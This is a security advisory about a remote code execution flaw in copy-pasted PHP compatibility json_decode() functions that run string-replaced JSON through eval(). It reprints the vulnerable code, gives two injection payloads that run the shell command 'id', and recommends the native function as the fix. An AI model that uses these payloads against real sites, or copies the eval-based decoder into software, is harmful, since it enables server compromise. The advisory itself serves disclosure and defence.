Just Another Hacker
Author's avatar

JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function

Several PHP compatability libraries contain a potential remote code execution flaw in their json_decode() function based on having copy pasted existing vulnerable code.

Identifiers

  • JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txt

Affected components

  • WassUp Realtime analytics wordpress plugin/compat library - https://wordpress.org/plugins/wassup/
  • AjaXplorer Core - https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released
  • FlexoCMS - https://github.com/flexocms/flexo1.source
  • Various code - https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code
  • compat_functions.php - http://techfromhel.com

Description

This appears to date back to a compatability library published in 2010 and appears in several code bases, with no, or a few variations.

The vulnerable code generally share the following characteristic: * The json_decode function is declared if it does not exist * some str_replace occurs to transform the json representation to PHP * eval($out)

Since eval() is turing complete, it is generally considered unsafe to use it on user controlled or user influenced data, however it is unclear if practical exploitation would be possible due to the likely presence of an existing json_decode function.

/**
             * compat_functions.php
             * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
             *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
             * @author: Helene D. <http://techfromhel.com>
             * @version: 0.3 - 2010-09-13
             * @since Wassup 1.8
             */
            
            /**
             * Convert simple JSON data into a PHP object (default) or associative
             *   array. Emulates 'json_decode' function from PHP 5.2+
             * @author: Helene Duncker <http://techfromhel.com>
             * @param string,boolean
             * @return (array or object)
             */
            if (!function_exists('json_decode')) {
            function json_decode($json,$to_array=false) {
            $x=false;
            if (!empty($json) && strpos($json,'{"')!==false) {
            $out = '$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);
            eval($out.';');
            if (!$to_array) $x = (object) $x;
            }
            return $x;
            } //end function json_decode
            }

Proof of Concept

The eval can be exploited a number of ways, both via full or partial control of the json string:

/* Payload
            `id`;//{"
            */
            json_decode('`id`;//{"');

or partially controlled content:

/* Payload
            {"key":"value");echo `id`;//"}
            */
            json_decode('{"key":"value");echo `id`;//"}');

Credit

Eldar “Wireghoul” Marcussen

Solution

Ensure json_decode is present as a native function for your PHP installation.

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!